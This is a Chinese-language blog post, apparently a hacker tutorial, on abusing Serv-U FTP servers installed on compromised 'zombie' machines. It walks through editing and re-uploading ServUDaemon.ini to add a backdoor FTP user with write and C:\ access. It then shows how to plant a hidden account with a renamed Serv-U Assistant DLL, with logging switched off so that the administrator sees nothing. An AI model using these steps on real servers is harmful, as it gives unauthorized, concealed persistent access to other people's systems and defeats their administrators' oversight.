如何利用肉雞上的Serv-U Ftp服務器

穩萊

如何利用肉雞上的Serv-U Ftp服務器

之一:添加一個用戶

很多肉雞安裝了serv-U服務器,我們可以把它利用起來,下面的方法是可以通過telnet或者nc命令行直接修改serv-U的參數而利用之。
在serv-U的目錄下有一個servudaemon.ini,關鍵是修改servudaemon.ini,第一步,當然是要先把對方的servudaemon.ini下載回來,在本機把它修改好。至於怎麼把這個檔取回來不是這裡討論的問題,方法很多。
下麵請看一個servdaemon.ini的範例,<>中是我寫的說明文字,不是文件中的文字。

[GLOBAL] <定義一些全局參數>
Version=4.0.0.4
RegistrationKey=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAawEEBLH71T7nA+cDAgAIUm9nZXJMZWUSbGls

aW5nanVuQHNpbmEuY29tB0VDTGlQU0UA
ProcessID=1748
[DOMAINS] <在這裡定義域名及IP,端口號>
Domain1=0.0.0.0||21|Wizard Generated Domain|1|0
[Domain1] <用戶名的定義>
User1=Anonymous|1|0 <第一個用戶是anonymous,即匿名用戶,允許匿名用戶訪問>
User2=1|1|0 <第二個用戶是1>
User3=2|1|0 <第三個用戶是2>
[USER=Anonymous|1] <用戶"anonymous"的定義>
HomeDir=d:\wutemp <用戶anonymous的根目錄>
RelPaths=1 <鎖定在根目錄,如果不鎖定在根目錄可以把該行刪除>
TimeOut=600
Note1="Wizard generated account"
Access1=D:\WUTemp|RLP <用戶anonymous權限設置在此處,R表示讀文件,L表示目錄列表,最後一個P必須有>
[USER=2|1] <用戶"2"的定義>
Password=cuA40FB53D1C89D1E7153EF826B6B38DC3 <用戶密碼設定,我不知道怎麼破這個密碼,如果不設密碼可以把該行刪除>
HomeDir=D:\temp
RelPaths=1
TimeOut=600
Access1=D:\temp|RLP <用戶"2"可以讀取d:\temp目錄下的文件,所以可以下載文件>
[USER=1|1] <用戶"1"的定義>
Password=hv12154DF65AC601DDA5D39C2F7B2E0F4C
HomeDir=d:\temp
RelPaths=1
TimeOut=600
Access1=D:\temp|RWLP <用戶"1"對d:\temp有列目錄的權利,可以讀寫該目錄下的文件>

權限設定具體說明:
RL 只能讀文件,下載文件
RWL 可以寫文件,所以可以上載文件
RWML M是可以刪除的權限
RWAMEL A是添加權限,E是執行權限
RWLCD C是目錄創建權限,D是目錄刪除權限

OK,所以首先是把對方的servudaemon.ini下載到本地的機器上,根據自己的需要把這個文件修改好,然後再傳上去覆蓋原文件。

修改的步驟是在[DOMAIN1]中先添加用戶名稱,如上例中已經有三個用戶anonymous、1、2,再添加一個用戶3,密碼為空,在d:\temp目錄下可以讀寫文件、創建刪除目錄,不鎖定在本目錄,同時對C:\有訪問權限。

先在[Domain1]下增加一個用戶,如下:
user4=3|1|0

然後再增加一個段,說明用戶"3"的權限
[user3|1]
HomeDir=d:\temp
TimeOut=600
Access1=D:\temp|RWLCDP
Access2=C:\|RLP

之二:添加一個隱蔽的帳號
在 Serv-U 中建立隱藏用戶(本地通過,未經肉雞測試~~希望大家完善本文)

在如今的 FTP 服務段軟件中,Serv-U 以其簡單易用性成為廣大管理員的首選,當我們控制一臺肉雞後,如果它採用 Serv-U 管理 FTP ,我們該如何建立一個隱藏的 FTP 賬戶來下載他的東東呢?

我們可以採用 Serv-U Assistant 這個軟件,可以到作者網頁 http://www.katkat.com/ 或者在華軍下載(目前版本為1.01)

這個軟件主要用於擴充 Serv-U 的帳號管理, 它採用Serv-U擴展庫,實現的原理為"帳號-映射",建立一個或多個帳號"映射",當在 Serv-U 中設置好一個固定帳號(即Serv-U的帳號)後,"映射帳號"就繼承了這個固定帳號的所有權限設置,每個"映射帳號" 有各自的登錄密碼。

下載壓縮文件 AssServU.zip,解壓後得到以下文件:
AssServU.dll -------- 擴充功能庫
AssServU.exe -------- 管理主程序
AssServU.ini -------- 配置文件
AssServU.mdb -------- 數據庫文件
AssReadme.mht ------- 自述文件

我們的目的是為了隱藏我們 FTP 賬號,因此第一步我們要獲取肉雞上的一個 Serv-U的賬戶名(僅賬戶名而已):3389圖形界面可以通過 ServUAdmin.exe 獲得;命令行下可以通過 ServUDaemon.ini 獲得,當然最好獲得權限比較大的用戶名(因為我們的隱藏賬號的權限與他的相同)

第二步:在自己的機器上做好配置:首先為了隱藏的需要,我們將assServU.mdb複製
一份為ServU.dat ,將assServU.dll改名為ServU.dll ;
雙擊 assServU.exe ,在 Settting 選項卡下的 Log options 中去掉 Log system
messages 、 Log error messages 、 Log file dosnloads 、 Log file uploads 前面的勾(這是
為了系統不記錄日誌);在 Account Datasource 中選 Custom ,在 Connection string 點
Set ,在"連接"選項卡中的"1。選擇或輸入數據庫名稱"中將 AssServU.mdb 改為
Servu.dat ,然後點"確定",在退回 Setting 選項卡後點 Save 。
在 Account 選項卡下添加用戶, Username 為你想添加的用戶,如:hacker, Password
為你的密碼,如:123, Serv-U account 為第一步中你選擇的權限較大的用戶,如:admin,
然後點 Save 按鈕。

好了,配置完成。

第三步:上傳我們的 ServU.dat 和 ServU.dll ,修改肉雞的 ServUDaemon.ini 文件,添加
以下字段:
[EXTERNAL]
ClientCheckDLL1=ServU.dll
然後重起Serv-U 服務

這樣你就可以用隱藏賬號登陸了,此時登陸賬號還是第一步你選擇的賬號,但密碼格式
為"你的用戶名=密碼",如果你像第二步那樣設置的話,登陸名就為admin,密碼為hacker=111

hehe,這樣管理員在管理界面什麼都看不出來

 

 給當前日誌評分:
Loading Vote
正在讀取評分資料...


文章來自: Tank部落格
引用通告: 查看所有引用 | 我要引用此文章
Tags: Serv-U
相關日誌:

評論: 0 | 引用: 0 | 查看次數: -
發表評論
暱 稱:
密 碼: 遊客發言不需要密碼.
內 容:
驗證碼: 驗證碼
選 項:
雖然發表評論不用註冊,但是為了保護您的發言權,建議您註冊帳號.